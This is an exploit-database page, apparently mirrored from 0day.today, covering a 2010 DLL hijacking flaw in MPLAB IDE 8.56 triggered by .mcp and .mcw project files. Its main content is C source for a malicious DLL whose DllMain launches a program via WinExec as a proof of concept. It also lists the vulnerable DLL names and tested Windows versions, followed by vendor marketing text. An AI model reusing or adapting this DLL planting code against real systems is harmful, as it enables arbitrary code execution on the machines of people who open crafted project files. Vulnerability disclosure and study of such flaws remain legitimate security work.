Lucene search
K

MPLAB IDE .mcp .mcw DLL Hijacking

🗓️ 31 Aug 2010 00:00:00Reported by kB0]1_Type 
zdt
 zdt
🔗 0day.today👁 27 Views

MPLAB IDE .mcp .mcw DLL Hijacking vulnerabilit

Code
=================================
MPLAB IDE .mcp .mcw DLL Hijacking
=================================
 
/*
 MPLAB IDE .mcw DLL Hijacking
 Date: August 31, 2010
 Author: kB0]1_
 Software: http://www.microchip.com/stellent/idcplg?IdcService=SS_GET_PAGE&nodeId=1406&dDocName=en019469&part=SW007002
 Version: v.8.56
 Vulnerable Extensions: .mcp,.mcw
 Vulnerable dll's: mfc71loc.dll,mfc71nld.dll,pe932b.dll,pe936b.dll,pegrc32b.dll
 Tested on: XP Pro SP2 & Vista SP2
*/
 
#include <windows.h>
 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}



#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
27